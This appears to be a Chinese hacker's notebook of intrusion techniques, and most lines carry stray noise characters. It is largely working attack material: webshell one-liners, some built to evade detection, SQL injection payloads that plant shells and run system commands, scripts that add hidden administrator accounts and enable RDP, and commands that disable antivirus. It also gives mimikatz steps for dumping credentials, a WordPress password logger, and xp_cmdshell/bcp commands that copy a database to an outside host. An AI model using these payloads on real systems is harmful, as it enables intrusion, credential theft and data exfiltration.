. u0 c1 _! Y+ j5 g' ~0 R# k
3 @" q( L' M$ x  l6 B查询sql server 2005中的密码hash4 U: K3 e3 s5 P  @9 w
SELECT password_hash FROM sys.sql_logins where name='sa'4 a2 |* V1 N4 s/ j2 l
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
0 K, }( }7 G" s# [' A( g" Gaccess中导出shell& Q( x' N$ ?, R  N6 }* q4 {( d

, b1 h5 A& f( w, ]中文版本操作系统中针对mysql添加用户完整代码:# X" k" c2 j+ ]: {
& l  k9 V( U7 D/ g9 q
use test;
5 g0 l5 q, ?! ~create table a (cmd text);
" _# t. r  c- S0 L& N- Iinsert into a values ("set wshshell=createobject (""wscript.shell"") " );/ s; W8 D; p5 ~9 b( P* d; k5 ]
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );3 w+ e1 k6 }& f; f, N4 g; {: H
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );- Q6 S% j( h+ x) T5 n4 g6 S+ a
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
" T, ]7 n0 o0 W* z# C/ {2 z- rdrop table a;
  U1 b8 K4 v; D3 `: I% ~) d
  p/ C4 s) t# F) w英文版本:
6 C+ _! }% H3 n7 [2 W8 n: C- e8 c
use test;
5 a# h& R. a$ _" W" o+ \8 Xcreate table a (cmd text);
$ o! L% B5 `' R7 S, B2 Linsert into a values ("set wshshell=createobject (""wscript.shell"") " );+ H3 I4 |! I' x$ }8 G( {
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* X. |2 r+ O/ I, i
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
  W; N6 f" [1 j& T( s) G2 Kselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
( p( ~1 B- `4 ?1 |$ a1 }  \2 G3 Hdrop table a;6 F! N7 s: R4 q# T1 j
. M9 L0 H4 p2 U
create table a (cmd BLOB);3 Z9 v1 i0 k' R3 [# l& \: |
insert into a values (CONVERT(木马的16进制代码,CHAR));
& ~- E, h# K( f$ d6 ], t. Qselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'/ _7 M4 r+ j9 g/ }2 k4 C
drop table a;' e+ g* u/ @" D' x1 b. _8 F8 S% a
! R1 X3 J0 S7 z' L8 u  {
记录一下怎么处理变态诺顿
; b6 W. [( z: [4 J1 u$ N查看诺顿服务的路径' V# K. Y0 L9 f  I
sc qc ccSetMgr, M( D6 b( Z- Y9 O
然后设置权限拒绝访问。做绝一点。。0 S/ ~( _( M, i, @8 N, b
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system9 a5 ?  ~6 |/ l6 N' y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
3 ?/ Y2 y& ?  Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators/ t  v! D8 d5 c. _* j( @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
! ?! ^  |/ S1 G8 W; Y' Z; i  I6 [/ f" {8 j% k, J
然后再重启服务器0 d2 e; {$ _2 R- N; A8 i' f+ i# C
iisreset /reboot6 q6 }$ M% r0 S% U
这样就搞定了。。不过完事后。记得恢复权限。。。。3 a# Q3 W' r2 Z% k# S6 F' P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F8 e: h! W1 {3 \" E- o
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
% N/ b; v: P8 [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F8 [5 c& H+ s. x2 B7 T
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
7 N1 @5 m( e7 FSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin& G  |0 k3 z* M+ c$ Q+ ~
: N# O# D( O& k) n3 C7 \0 g
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
8 ~! |: m( |6 p& _9 R4 v' u
# W- ?! X" h- T1 T! ^postgresql注射的一些东西
; J" v% o, u3 r& M. U- o如何获得webshell
  [8 N* U: t5 y/ Q) h4 ?" Qhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
& C; v" m' A; n9 ^http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
0 G4 E* P9 a- k, y0 s  H# m1 ^http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;% O! ^. t2 M: v8 P! L3 z0 p1 N
如何读文件
1 K% Q: A. v4 X! `) t2 y5 Y5 o7 Mhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);, j7 I4 D* N$ S- I' P
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
7 d) X' ^* C4 H% k* bhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
: @4 |+ ~' o1 b$ b, K* t5 @/ w
; W2 N/ [% G( kz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。  J8 d5 v6 D: ?: P) x% S
当然,这些的postgresql的数据库版本必须大于8.X$ ^2 W* g1 e3 P7 a" \
创建一个system的函数:
9 ?4 O& P' m+ h, x4 {CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
2 R. w! D6 a0 g6 Z3 A% X, P
/ u/ _. t0 K8 ?3 _2 L3 o  `; Q创建一个输出表:
. @& D6 P, |0 m4 GCREATE TABLE stdout(id serial, system_out text)8 v+ A0 ]1 j) w' o- g( M, o
2 n% U% ]( z. y2 O
执行shell,输出到输出表内:
& @, m+ @0 q7 iSELECT system('uname -a > /tmp/test')
8 Q- k) m4 R2 R, K- V2 E% y' e
% X! S- H4 E) b: x$ }  Qcopy 输出的内容到表里面;% E8 U1 z& F. y, g2 V' H  h, V- B8 x
COPY stdout(system_out) FROM '/tmp/test'/ O2 ~' N( G4 t7 p. f% F) y4 N

  a  ~1 N4 k7 ~. ~- p从输出表内读取执行后的回显,判断是否执行成功
3 P/ ]3 a6 E0 L  [9 y
2 r) n: w. H3 S( M) G; [' VSELECT system_out FROM stdout8 n) q  b# _- _% [+ N" q
下面是测试例子
  N. J0 U+ F5 ^: c( o1 B* V  \! j5 T
# G4 {: k& [* a+ x" i2 q/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ; ?4 I3 K9 m( v- M1 M( v# `
0 S! T2 v+ y$ z
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
: N# ^2 Y( Z$ y7 T% i! g; o1 k$ D+ ^STRICT --# I' J1 t( H6 Y4 _8 P2 S. ~" }

( w, T, s5 S# ?8 K% ?/ D3 n3 d/store.php?id=1; SELECT system('uname -a > /tmp/test') --2 ]% D4 X0 W( f+ P5 z) l
$ a0 ^1 @6 b7 {$ B: t( }9 K" E
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
* H+ d3 ?: _6 R4 A, \  e
0 ^3 M3 s" k8 R/ s1 L/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
5 G) P$ K8 D) snet stop sharedaccess    stop the default firewall
: {# n, o$ ^: Inetsh firewall show      show/config default firewall
: @. I4 N: F( n+ w  |netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall' M# [- ?+ K) J8 ^5 {$ a
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall+ {2 e: G. T* O: ]6 k! I6 B! a
修改3389端口方法(修改后不易被扫出)  i% B) k. u& h% U' m
修改服务器端的端口设置,注册表有2个地方需要修改. F; Z" h: {$ M$ i) n9 ?/ K
$ i; z& z* t! F: r8 Z- t! {
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp], U! _  }5 J" b7 |8 }) N4 T
PortNumber值,默认是3389,修改成所希望的端口,比如6000
: \! n7 D1 v$ ^( \
" g6 S+ {, h# j! L' Q" ^1 W第二个地方:
, O% P9 \/ ~4 B  r$ k[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
4 u8 d1 M$ D+ YPortNumber值,默认是3389,修改成所希望的端口,比如6000) u6 T: ?+ |: a2 _2 K2 G

, u$ z9 y9 y& e; ?$ l6 W/ Y5 W* G现在这样就可以了。重启系统就可以了
8 w* [8 ^% n' V, @$ A/ y5 z: w% Z4 R. L" k# H& c7 p
查看3389远程登录的脚本& F% D/ c# i* m3 n1 ^2 M; s
保存为一个bat文件0 R; y$ k5 p5 A+ [- u, i) z: o9 m
date /t >>D:\sec\TSlog\ts.log3 \6 I+ c1 Y( L+ f4 H+ q1 b# n" v) l
time /t >>D:\sec\TSlog\ts.log3 c) g+ u! `$ n
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
# P+ w: q4 H9 o7 X+ |; a& S  w4 @start Explorer9 R! T! W. ~, V4 i: F- R, w. d  Y
) n- {& v/ J( f- L8 L& s
mstsc的参数:) z3 @. ?& \; {$ z
1 N8 Z/ f) u6 P4 v# M+ |4 r
远程桌面连接
0 o: c) A3 _+ h( G) \6 W
, R3 j/ k  L$ }3 _3 Z0 eMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]  a0 J3 S0 l+ G8 z
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
" y; w% Z' {% I1 G$ L0 W1 U- X' L# D9 B+ ?( F& i
<Connection File> -- 指定连接的 .rdp 文件的名称。, Q2 M, B& \4 G7 R; P* F" A

9 B9 o0 |; Y) H) ^/v:<server[:port]> -- 指定要连接到的终端服务器。* V0 \8 R3 H6 F" q/ \# `% G# A
1 E2 V( o/ S8 R* j( \
/console -- 连接到服务器的控制台会话。. Z1 H' z! X* Z( V
& }2 |6 o$ H0 N; r
/f -- 以全屏模式启动客户端。
0 Y3 p* d6 u5 }1 I6 u9 X
3 m3 `2 u6 f  D  w0 r* H" r8 ?/w:<width> --  指定远程桌面屏幕的宽度。
) l6 [0 A9 G+ L' ?3 S
& u6 K$ o, ~8 N: U& W) ?2 S( b: x9 c/h:<height> -- 指定远程桌面屏幕的高度。
2 o& R* F8 l. h( E0 W' k( \( \
% H. h, Z# y) I  B! S+ p/edit -- 打开指定的 .rdp 文件来编辑。
$ K, E& @( `2 Y9 {0 X; e; m) W  C& ~0 d, ?' ]
/migrate -- 将客户端连接管理器创建的旧版. z8 t, p: T( s9 F+ L
连接文件迁移到新的 .rdp 连接文件。6 \$ E. C6 z! s
& y) P6 ]4 O& F; ~* r
* M& m1 M+ a" E, }/ G
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就; a" e) d& j' q4 y
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
7 o: f2 \0 U" H
7 x3 ?. J* f4 |& ]命令行下开启3389
1 g, x; a& r: P1 onet user asp.net aspnet /add' b( P( x% ]+ `
net localgroup Administrators asp.net /add
' e/ [/ }: ]9 _9 U& F1 j  p1 hnet localgroup "Remote Desktop Users" asp.net /add
( \" t) [. N7 F+ wattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D; g: E5 W! H6 Q- i. w
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 09 Y7 i6 T4 t  a( Q
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 11 _8 O% X7 s4 Y% }" k
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
0 }# w/ x# |, v+ A) {$ l2 Dsc config rasman start= auto
4 U8 C9 U! F# \; C- g* h0 fsc config remoteaccess start= auto& Q+ h# S( A# `5 R2 P( B7 m
net start rasman
* {! \8 z* v4 {5 Y. fnet start remoteaccess, K. }. K1 h# \5 E1 N! g' u5 P8 y6 k
Media
* v' z# `) |% {% W<form id="frmUpload" enctype="multipart/form-data"
) V# |- M' E: K2 \: M) l; W/ V; raction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
: s; `5 A( v) j6 G5 K% |<input type="file" name="NewFile" size="50"><br>6 w& V6 D, f" F$ ~
<input id="btnUpload" type="submit" value="Upload">& A$ ^9 `7 i' P- ^% _; d
</form>& t- g' e& t2 }2 P6 y# _# {

" S6 D% g, v3 J" _control userpasswords2 查看用户的密码
( I* O# l% ~& C6 L/ D2 a# m' Iaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径  C6 t- s' N, G/ Z0 q
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a; Q" N  G! [7 |* |

7 _1 F( V/ k1 b$ w" l6 e# g! K" p, I141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
4 d  t2 U/ j1 N测试1:
* P9 i0 `$ u8 ~3 W" |SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t15 ?' k: N) J, s

, ?+ U3 K7 y6 ]' ~' d0 N测试2:
+ s# g1 [8 `8 D4 X  j( q1 k* f& i4 |5 R7 j
create table dirs(paths varchar(100),paths1 varchar(100), id int)
4 `! [3 W7 {' K' @; C/ v
" s! @- \: ]' x7 E0 Zdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
. J/ o% d5 B4 |/ U$ u) V; Q+ U5 ?0 s- g1 r' q
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
+ o: F7 l1 a( S: j关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令8 h9 ]7 Z* B- y, A4 T$ q
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
. z4 B& p9 p6 k6 i( Znet stop mcafeeframework: q6 @/ ]$ Y9 S+ m& x  x0 i
net stop mcshield" V6 k" J. }3 v& V5 {2 r
net stop mcafeeengineservice
7 a% G- O  v8 ?1 o) q8 enet stop mctaskmanager
8 i, N+ v  b+ |0 n7 m- W( ~* Chttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
* l' l, L9 [9 o  F/ G9 t1 ?+ x6 J
  VNCDump.zip (4.76 KB, 下载次数: 1) 1 n" f6 }. Q7 |$ m; p2 E
密码在线破解http://tools88.com/safe/vnc.php  n" R4 e/ [3 w- g: b
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
" j1 g" S1 j0 G. |7 s4 [8 E4 @% k8 l0 V' n6 |3 Q. G( ^
exec master..xp_cmdshell 'net user'
. c  n& A' N. d/ ~3 Amssql执行命令。& R0 Y) i, G  j1 U- l- S
获取mssql的密码hash查询' P6 Q1 \5 H5 p6 S. P6 d) y
select name,password from master.dbo.sysxlogins5 Q7 B# o4 }0 v0 m

, c* s" Y' g+ hbackup log dbName with NO_LOG;
8 g8 A6 D  X* M  r/ Ebackup log dbName with TRUNCATE_ONLY;
+ H/ Y9 E* k- s" f- lDBCC SHRINKDATABASE(dbName);
3 c5 a1 i: Z" N: I: F& Ymssql数据库压缩
6 O; G: w' j- H+ h/ q
! N. x8 O9 T; Y3 xRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
% L2 W) Z( q; w; p# u6 h将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。5 y5 F. F0 A* {# S" ]
2 Z+ \/ C( C! K4 f7 ~/ k
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak': a" I. ]+ H. z3 C; }
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak. Q8 @( c5 n) W2 m
$ e# [" X, x) g# _- J) `
Discuz!nt35渗透要点:; W- I; E: ^7 U2 y
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default: c+ @6 @9 h7 l; A8 f  {
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
  J# T. r" S2 [(3)保存。
! s! P" z& c  W$ ]& [(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
. ?$ W+ M* A; w: Q# O$ ^: Md:\rar.exe a -r d:\1.rar d:\website\! H' u' q/ ^% x; f) Q
递归压缩website! a6 J& v9 q, n
注意rar.exe的路径
, j4 ?$ j( p5 B+ i# L) O6 W+ V2 [% B/ [* J& X8 j' x
<?php  Q$ C- Y* T6 W% h" S

% t4 n- ~" z: K$telok   = "0${@eval($_POST[xxoo])}";" s+ }" `; Q2 n4 A) ]( u
" e- @; {* e' u  `" o8 h- ^1 U$ N
$username   = "123456";
, Z6 |3 D& C7 q6 i, J* n7 I( `1 n3 q+ A- o0 V7 W' B7 I. Y9 A; A
$userpwd   = "123456";
$ h. ?, g  Y% F% }, E" Z" i, x
. ?3 y" @& a- Z$telhao   = "123456";
2 A- P4 D0 m& K" l- R. s$ J4 r6 ~7 i- y
$telinfo   = "123456";, a0 g( Y' g4 N$ \& U8 M' N3 n: v

- u7 {( R. e- k?>
$ I1 n) V( b6 B. I. f; T" G+ p* ephp一句话未过滤插入一句话木马% h! I: u! n' W- H; I4 M
: E1 ]# J5 k# ~+ [0 C+ w( Y& V
站库分离脱裤技巧
5 ~- O0 \& Z, |, k9 }/ a4 Dexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
; X. I  m2 R. l. Iexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
1 v3 e. {( x( \5 }条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
3 T# `/ K% |8 f/ g5 t$ x这儿利用的是马儿的专家模式(自己写代码)。
* p4 I+ t3 ]  j# |: @ini_set('display_errors', 1);/ v& b1 j) f$ M' S
set_time_limit(0);
7 c- a9 T6 q. `2 w$ Yerror_reporting(E_ALL);% ]' k1 X' _5 _- {$ _9 Z& M
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
* P6 y) Q2 R+ ^4 P; b+ Z7 imysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());6 ^$ f. f/ Q4 T
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());* d( B9 A* W5 w+ J* J& s
$i = 0;. z4 `% x- z$ J" r" N! |
$tmp = '';2 |! }& _, S; U( ?
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
& d' b, {: d, z: h7 e! |: Y    $i = $i+1;% q+ ^! Q4 e7 {, S
    $tmp .=  implode("::", $row)."\n";
. j% @' N2 V' ~0 i" n0 A7 n4 M9 [    if(!($i%500)){//500条写入一个文件
3 N9 e% `) e" H3 @) q        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
" p! r# T8 \/ N$ W" p        file_put_contents($filename,$tmp);4 |6 X( \: D- M' a7 M& m* E9 w3 f* Q
        $tmp = '';  }  ^+ A0 i2 b& t- ~3 U8 X4 [  ]
    }
% |( ~$ Q" n% j! M' _}
- S' }8 {+ Y- n+ T6 Fmysql_free_result($result);# h7 J4 ~' i: J7 a+ D' V
7 Y) b' T4 W1 j7 T$ v

, W/ P" r  t: a1 M5 _) {! h6 W2 g' j" t
//down完后delete5 A8 X1 {( P' M7 U, B

) T1 v5 S( G. O: u( {4 p3 G) ]' v  \+ K+ B% {
ini_set('display_errors', 1);) h& i* g& |# l6 {  g
error_reporting(E_ALL);* `; J+ U4 ?. ~% Y
$i = 0;
/ A" j) h$ J0 d# y; qwhile($i<32) {3 M  L$ E+ r, `! p5 M, z3 {1 E  R2 U
    $i = $i+1;! t- D# K# g, \% l
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';' u. M* E; F' o; Y9 }1 }+ e
        unlink($filename);
. e9 j% r$ ~  a- K}
+ d* D7 x* q7 g+ Jhttprint 收集操作系统指纹
; G7 P+ ^. z2 d) _! L/ m; }扫描192.168.1.100的所有端口
! f+ X2 t8 V5 [% G8 i) }nmap –PN –sT –sV –p0-65535 192.168.1.1008 P8 U# y) o( Q! x/ ?# G' o
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
1 w) ?/ b0 c# M# }) jhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
% r' T6 C3 V2 l, k8 g. \; W0 p( xNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host+ O* J+ O5 j% v" X( i2 V8 l

! q. K9 A3 E) K1 `# k( cDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)6 u- Z# A3 B, O0 O6 G; H9 Y) N$ D
! H& w1 w* J; ~; ^! X
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
; J" l  F$ Q, ^, \8 p6 \6 ^8 H! r# {- L8 U% s1 _; w
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x9 ^* |: [+ C% C) L( G
; e- q/ s4 O  [3 l7 g0 k
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
* l  b4 q- N) k( Z) o, Q, J. C% b; i$ {: G- j* t
  http://net-square.com/msnpawn/index.shtml (要求安装)
+ R# i) t4 h6 U* H  `2 G" ~* I# P, L
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
2 B" i7 I4 t' K  T- j( S$ V3 S: }( g1 a1 B& L' l( ~. M* p2 M
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
  @4 Q5 i. e6 Y! J- }set names gb2312
5 {; U+ @: M" L( W4 `! H; B6 R0 G导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
/ f4 p( M  g& O  r$ ?: w  r8 T7 M+ ^9 h9 P" s% U
mysql 密码修改
9 A; W& S+ a; R/ Y% b& z" l# N8 J$ x1 XUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
* v" ~, _3 O1 q6 C4 ~7 k- w8 eupdate user set password=PASSWORD('antian365.com') where user='root';4 x) \/ W, z0 ^* s3 l
flush privileges;5 N% [* d: |( j4 Z5 u4 O+ i/ X
高级的PHP一句话木马后门: L; T$ x% \) _& {) @5 y
2 F& q6 r! y- a& ^; k. U
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
# ^3 w$ y! I3 L- q
, s" n3 y  P% r7 P1、' A, O+ ?0 f" W2 x) i

6 a5 o2 n/ S; V, |$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
3 H3 g7 S* b' Q+ e/ R" a1 F
( S: q( \; w0 Q+ L2 k) `$ s$hh("/[discuz]/e",$_POST['h'],"Access");; ?0 w$ H! ~1 a1 p( I, j" d' n

' z0 z; |: v" p//菜刀一句话
1 n8 `; }* K- d- }* |  d
& F% m6 @0 P% B( F2、0 @( `' t* R) U" f) k" W

3 S- X0 o$ P  |; }$filename=$_GET['xbid'];: ?1 T2 R6 i4 Z$ l( W$ p1 Y
# W& H2 c8 c3 u/ w
include ($filename);: q3 M% j  ]8 N2 W
# s/ V; c+ R. Z3 [6 w
//危险的include函数,直接编译任何文件为php格式运行
4 g# ]) R# L# x! D& D
$ m, T0 k# M& Z; w; L2 J3、
! c% J( o) h: a
# Q2 t8 q6 w* d" F  k; V$reg="c"."o"."p"."y";
' m5 L; s* N* M$ Q) k7 S  i
4 F8 S8 _' \% {+ e0 e$ N2 @$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);* i) ?4 ?( K! v' @" r8 l! ~
- f# F/ g# S5 u1 X$ A! t+ r
//重命名任何文件* V$ A4 O4 ]. r( g" A' s+ K9 W
3 G' b; `4 T% H% [: ]
4、
' J3 u" R$ A4 W( r" U7 }4 t7 y; h
/ f7 _2 h2 m! v" a$ S( R. G: ]$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";: L: Y$ o8 y/ J2 M

+ p2 e; n' G  Z0 w$gzid("/[discuz]/e",$_POST['h'],"Access");/ @3 i5 ~5 v2 R* M

; T" C/ y) c" ~6 O' ]0 M1 M4 q//菜刀一句话
- ~+ {5 o' V7 j8 |; D9 s# G. t; y/ _' X6 V& U
5、include ($uid);' _+ T9 N" ?, G+ ]$ L

  o7 R, h! I- T" `: S2 d+ |//危险的include函数,直接编译任何文件为php格式运行,POST 3 @3 X& q  N1 U( _, V
( J8 [' w. B8 e
. N1 m8 e" K' e) M- }, u! z
//gif插一句话
9 X3 H) N8 Z) _+ G  o: I* F
0 X$ s& G  y9 C  a6、典型一句话
& Q6 r  y  ?4 e2 }+ D1 b7 @  _
+ h3 K' P+ S+ K- ]9 a0 o8 W程序后门代码
& J, m; u. B" N6 |7 S3 i$ V4 i<?php eval_r($_POST[sb])?>$ V! \  m: \7 y- X
程序代码
3 |3 N, z) x1 h<?php @eval_r($_POST[sb])?>, J& W* `5 {0 D  l1 ]1 P  s+ q
//容错代码
& m% h) D5 B4 F9 \+ i1 _7 {# L' {程序代码
6 ?, q' H! S  D: J; x/ M0 Z& M3 Q' l<?php assert($_POST[sb]);?>% Y% D5 O; \0 E' E; r' ~
//使用lanker一句话客户端的专家模式执行相关的php语句- E+ s% M# w* m# p: o) A6 H7 T; C8 b
程序代码
( C( h7 |4 i7 r  w* L<?$_POST['sa']($_POST['sb']);?>5 _* u& X. g1 b
程序代码
, ]  C3 D: T) l' p<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 `4 f+ {; ?3 k* e! Z( m: w4 X" g1 V
程序代码
# {5 c6 n: L. B9 x8 @  }<?php
; b/ o) G/ v2 |" W@preg_replace("/[email]/e",$_POST['h'],"error");
3 x; K+ N6 B2 L& [?>
" ?7 q7 [8 _4 e$ }//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
% o" e. ^) c. j8 ^. t; g+ `9 B程序代码
7 ?9 R) w* v: L) _! n, u<O>h=@eval_r($_POST[c]);</O>
( N: T6 P8 a; W( E  s& T4 p程序代码- C- I  {7 y- H7 X
<script language="php">@eval_r($_POST[sb])</script>
( P( N2 r# x9 K! {//绕过<?限制的一句话
' r" [6 s% l2 K% f0 p& S. L( A% _0 d% A* B8 L
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip4 `1 g6 `3 A# V: v# ~/ n2 R! c6 L
详细用法:
; o- F5 \- x, J: x: U  Q1、到tools目录。psexec \\127.0.0.1 cmd
5 o7 `2 x& O% w+ @1 s* T8 T& ^2、执行mimikatz
$ A0 x5 E# C# f, R2 b" D0 G9 {3、执行 privilege::debug* A8 @+ |( g; F: X
4、执行 inject::process lsass.exe sekurlsa.dll+ B) D7 b5 R( H1 o
5、执行@getLogonPasswords! Z: a- P. O  ]' b0 E
6、widget就是密码
: w8 ?) Y, C% }" O7、exit退出,不要直接关闭否则系统会崩溃。. l2 C2 \4 o, _( A$ }- @5 F
" D* E/ \, D" {% H( d5 _
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面; ], S5 J4 S! N* {+ c! A
4 F" [0 l9 C5 O- A" \7 o. ^& B  A5 d
自动查找系统高危补丁# T/ N, U3 u1 b; n! P" |. J  B: O
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt) }4 ]" {4 c! N4 H6 [- D9 V9 Y4 U4 i
6 h7 h+ l* d: G' `  n6 ~* W. V
突破安全狗的一句话aspx后门
- U0 A- z% \" h" q# C# r<%@ Page Language="C#" ValidateRequest="false" %>
% _6 k# `& a/ j/ g* M' p/ Y<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
6 `& S9 @  P0 O( W+ L$ U4 Owebshell下记录WordPress登陆密码
0 M: [* W1 }5 D- L: j5 N0 Uwebshell下记录Wordpress登陆密码方便进一步社工7 Y  F/ L* a* o* ]4 X8 j0 K* C
在文件wp-login.php中539行处添加:
1 C- g! }& m! Y5 F+ n( H* j8 t8 u" l// log password
; \/ Y% A4 r6 L* L* z$log_user=$_POST['log'];
! z% X6 m* ^+ v/ f1 X+ l' U$log_pwd=$_POST['pwd'];# b! ?+ @  f9 X5 a) ~  z; a6 y0 H
